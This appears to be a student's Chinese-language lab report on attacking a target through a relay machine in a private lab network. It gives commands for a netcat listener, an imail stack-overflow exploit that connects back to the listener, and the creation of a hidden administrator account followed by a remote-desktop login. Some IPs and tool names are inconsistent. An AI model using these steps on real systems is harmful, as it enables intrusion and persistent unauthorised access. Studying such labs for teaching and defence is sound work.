信息系统攻击与防御
实验报告
实验题目:    利用肉机攻击目标机   
学    院  计算机       
专    业  网络工程         
班    级  09级01班         
姓    名  刘安琪           
学    号  40909040125     
实验名称利用肉机攻击目标机
实验目的黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现
环境配置
1.目标机为:192.168.11.61
2. 本地机为:192.168.11.66
3 .目标机的389端口即ldap服务打开
4. 本地机的c盘下存在imail、nc软件,imail为栈溢出漏洞,可以利用该漏洞攻击对方,nc为小软件实现监听本地机器的未占用端口。
5. 本地机的c盘下存在mstsc文件
实验相关知识
1、端口对应的服务:黑客必备cmd命令大全
25
FMTP邮件
42
WINS
110
POP3
3389
终端服务
389
LDAP服务
2、如何看本地端口?
使用命令:netstat -an
3、黑客、肉机、目标机示意图:
肉机1在内网中,IP地址为:192.168.11.100
Internet出口地址:202.29.12.100
则:DMz administrator看到的应为即内部地址:192.168.11.100
但从cmd 中的命令行看到的是internet出口地址202.29.12.100
实验步骤
1、运行cmd命令进入命令提示状态;
提示结果:
2、打开目标机的端口389:
使用命令:telnet 目标机 端口
具体为:telnet 192.168.11.61 389
提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。
3、监听目标机的端口81(80一般不用)
使用命令:nc –l –p 81        //其中:-l 表示监听, -p表示端口,81和80为本地机器的端口。
提示结果:
4、另外打开一个命令窗口,因为nc命令一直在监听81端口
方法:运行cmd
提示结果:
5、输入imail命令,进入对方机器
使用命令:imail 7_8 –t 0 –h 目标机 –i 肉机 –p 81    //其中:-h表示目标机,-i表示肉机
具体为:imail 7_8 –t 0 –h 192.168.11.62 –i 192.168.11.66 –p 81
提示结果:
6、在目标机中加入用户
使用命令:net user 用户名 密码 /add
具体为:net user hack119 123 /add
提示结果:
7、将所加用户加入组本地组
使用命令:net localgroup administrators 用户名 /add
具体为:net localgroup administrators hack119 /add
提示结果:
8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号
使用命令:mtstc
提示结果:
9、进入对方机器
点击连接按钮即可。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。